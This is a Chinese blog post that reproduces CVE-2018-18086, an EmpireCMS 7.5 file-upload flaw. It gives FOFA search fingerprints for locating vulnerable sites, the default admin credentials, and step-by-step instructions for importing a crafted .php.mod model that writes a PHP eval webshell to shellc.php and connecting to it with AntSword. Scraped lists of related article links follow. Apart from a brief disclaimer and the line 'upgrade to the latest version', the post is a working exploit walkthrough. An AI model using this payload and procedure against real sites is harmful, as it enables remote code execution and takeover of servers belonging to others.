所有文章，仅供安全研究与学习之用，后果自负!

empirecms 文件上传 （CVE-2018-18086）

0x01 漏洞描述

EmpireCMS（帝国网站管理系统）是一套内容管理系统（CMS）。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码：admin/123456 后台路径：/empirecms/e/admin

fofa 指纹

app="帝国软件-EmpireCMS"
app="帝国网站管理系统-Powered-by-EmpireCMS"
title="帝国"

0x02 影响范围

EmpireCMS<=7.5

0x03 漏洞复现

（1）访问靶场
后台地址

/empirecms/e/admin/index.php

（2） admin/123456 进入后台

点击系统 -》管理数据表-》导入系统模型

（3） 随意填入表名
导入 *.php.mod 文件
内容如下
注$ 需要加入\转义
将后半段 phpshell写入到shellc.php

<?php file_put_contents("shellc.php","<?php @eval(\$_POST[cmd]); ?>");?>

（4） 点击马上导入 跳转到该页面

（5） 访问是否上传成功

(6) 蚁剑连接

0x04 漏洞修复

升级到最新版本

帝国cms empirecms 文件上传 （CVE-2018-18086）复现相关推荐

1. 最新系统漏洞--Victor CMS任意文件上传漏洞

   最新系统漏洞2021年11月25日 受影响系统: Victor CMS Victor CMS 1.0 描述: Victor CMS是尼日利亚Victor Alagwu软件开发者的一套开源的内容管理系统 ...

2. (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)

   漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...

3. empirecms 文件上传 （CVE-2018-18086）漏洞复现

   1.漏洞详情 EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS). EmpireCMS 7.5版本中的e/class/moddofun.php文件的'LoadInMod'函数存在安全漏 ...

4. 帝国CMS后台前台上传大小和类型限制的解决方法！

   首先先调节帝国后台的参数,如下图: 这样一般就可以了!如果还提示上传大小限制,那么你可能上传了超过2048K的图片或者附件了,解决方法如下: 一般服务器php.ini环境配置文件默认上传大小为2048 ...

5. Pluck Cms文件上传结合命令执行复现

   本漏洞影响 Pluck CMS Pluck CMS <=4.7.10 部分解释来自零组文库 安装模版+文件包含导致任意命令执行 很多CMS都会在安装模版的时候getshell,那么这里笔者也发现 ...

6. empirecms 文件上传 （CVE-2018-18086）

   一.漏洞描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行.EmpireCMS7.5版本中的/e/class/moddofu ...

7. 狮子鱼CMS image_upload.php 任意文件上传

   漏洞描述 网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多.主要用户各种购物,本文主要介绍其中两个文件上传漏洞,漏洞复现以及漏洞工具分享. 漏洞影响 s ✅狮子鱼 ...

8. CatfishCMS文件上传漏洞（CNVD-2021-42363）

   本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

9. 代码审计--CatfishCMS文件上传漏洞

   声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载. 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作 ...

最新文章

1. 我对CONTAINING_RECORD宏的详细解释
2. android文件下载含服务器端,制作http/https文件共享服务器的Android下载管理器
3. Bootloader传参数到Kernel
4. websocket 获取连接id_websocket建立连接时能传递参数吗
5. 高并发高可用的 架构实践
6. mysql sum 慢_故障分析 | MySQL 优化案例 - select count(*)
7. Scala初步学习（二）
8. 牛腩购物网25：购物车的实现
9. 网易云通讯与视频_总结_00_资源帖
10. oracle表同步 job,Oracle中通过Job实现定时同步两个数据表之间的数据
11. 《Linux驱动：USB设备驱动看这一篇就够了》
12. 土豆嫁优酷：烧钱的宿命？
13. windows11 解决桌面缩放模糊的问题
14. 智慧水务信息化系统的意义
15. latex 公式编号的自定义
16. 求解矩阵Ax=b最小二乘问题
17. 自然语言处理顶会 NAACL 2018 最佳论文、时间检验论文揭晓
18. 计算机用的云电脑,玩家怎么才能将家用电脑变成云电脑？
19. python基础课程设计项目_Python+MySQL开发医院网上预约系统（课程设计）一
20. 中山大学计算机在职研究生分数线,中山大学在职研究生复试分数线详情

热门文章

1. java双重for循环流程图_java 流程执行 循环 foreach循环
2. 百度语音识别api使用（Java版本）
3. 智能汽车供应链的“新主角”
4. Win10系统wifi热点经常自动关闭怎么办
5. iPhone 4行货尚远 水货暴利2千元
6. 很喜欢的句子，丧的时候就来看看吧
7. js读写本地文件js读写本地文件
8. python循环语句嵌套for range_python的列表的增删改查,元组的嵌套,及for循环,range的使用...
9. c语言中存贮班级学生的变量,C语言----变量教案.docx
10. 【卫朋】华为 IFS 集成财经服务流程（限制版）